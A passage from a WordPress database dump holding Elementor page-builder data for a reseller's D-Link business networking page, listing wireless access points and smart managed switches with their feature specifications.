Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"149\",\"right\":\"149\",\"bottom\":\"149\",\"left\":\"149\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7247,3364,'_elementor_version','2.5.14'),(7248,3364,'_elementor_edit_mode','builder'),(7252,3365,'_wp_page_template','template-fullwidth.php'),(7253,3365,'_elementor_template_type','post'),(7254,3365,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"149\",\"right\":\"149\",\"bottom\":\"149\",\"left\":\"149\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; 